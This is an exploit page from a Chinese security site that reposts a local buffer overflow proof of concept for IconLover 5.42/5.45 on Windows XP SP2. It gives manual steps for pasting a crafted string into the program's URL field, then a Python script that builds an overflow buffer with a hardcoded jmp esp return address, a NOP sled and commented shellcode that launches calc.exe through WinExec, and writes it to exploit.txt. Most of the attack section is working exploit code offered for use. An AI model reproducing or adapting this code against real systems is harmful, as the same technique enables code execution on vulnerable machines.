首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IconLover 5.42 - Local Buffer Overflow Exploit 来源：cor3sm4sh3r[at]gmail.com 作者：cor3sm4sh3r 发布时间：2015-09-30   # Exploit Title: IconLover v5.42 Buffer Overflow Exploit # Date: 29/09/2015 # Exploit Author: cor3sm4sh3r # Author email: cor3sm4sh3r[at]gmail.com # Contact: https://in.linkedin.com/in/cor3sm4sh3r # Twitter: https://twitter.com/cor3sm4sh3r # Category: Local # Tested : win XP professional sp2     ''' Credits & Authors: ================== ZwX (http://zwx.fr/) [http://www.vulnerability-lab.com/show.php?user=ZwX]   #References (Source): http://www.vulnerability-lab.com/get_content.php?id=1609   Affected Product(s): ==================== AHA-Soft Product: IconLover - Software (Windows) 5.42 and 5.45     Manual steps to exploit... 1. Copy the content of  exploit.txt to your clipboard 2. Run the IconLover.exe software 3. Click the File -> New Icon Lybrary option 4. Click the Lybrary and push the Download button 5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide 6. Successful exploitation will open an instance of calc.exe!    '''     #!/usr/bin/env python #badchars = "\x00\x0a\x0d" junk  = "\x41" * 1039 eip  = "\xed\x1e\x94\x7c"    #jmp esp 7c941eed ntdll.dll ( XP sp2 ) nopsled ="\x90"*20   shellcode  = "\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register shellcode += "\x50"                 #=> PUSH EAX             |  Push EAX to have null-byte padding for "calc.exe" shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe"          |  Push The ASCII string to the stack shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc"          | shellcode += "\x8B\xC4"             #=> MOV EAX,ESP          |  Put a pointer to the ASCII string in EAX shellcode += "\x6A\x01"             #=> PUSH 1               |  Push uCmdShow parameter to the stack shellcode += "\x50"                 #=> PUSH EAX             |  Push the pointer to lpCmdLine to the stack shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d     |  Move the pointer to WinExec() into EBX shellcode += "\xFF\xD3"             #=> CALL EBX    shellcode += "\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register shellcode += "\x50"                 #=> PUSH EAX             |  Push EAX shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2     |  Exit process shellcode += "\xFF\xD3"             #=> CALL EBX   packet = junk + eip + nopsled + shellcode + nopsled   file=open('exploit.txt','w') file.write(packet) file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ManageEngine EventLog Analyzer ·Watermark Master Buffer Overfl ·BisonWare BisonFTP Server 3.5 ·ManageEngine ServiceDesk Plus ·PCMan FTP Server 2.0.7 - Direc ·RedHat Enterprise Linux 7.1 De ·Watchguard XCS Remote Command ·LanSpy 2.0.0.155 - Buffer Over ·Watchguard XCS FixCorruptMail ·LanWhoIs.exe 1.0.1.120 - Stack ·WinRaR SFX Remote Code Executi ·Last PassBroker 3.2.16 - Stack   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved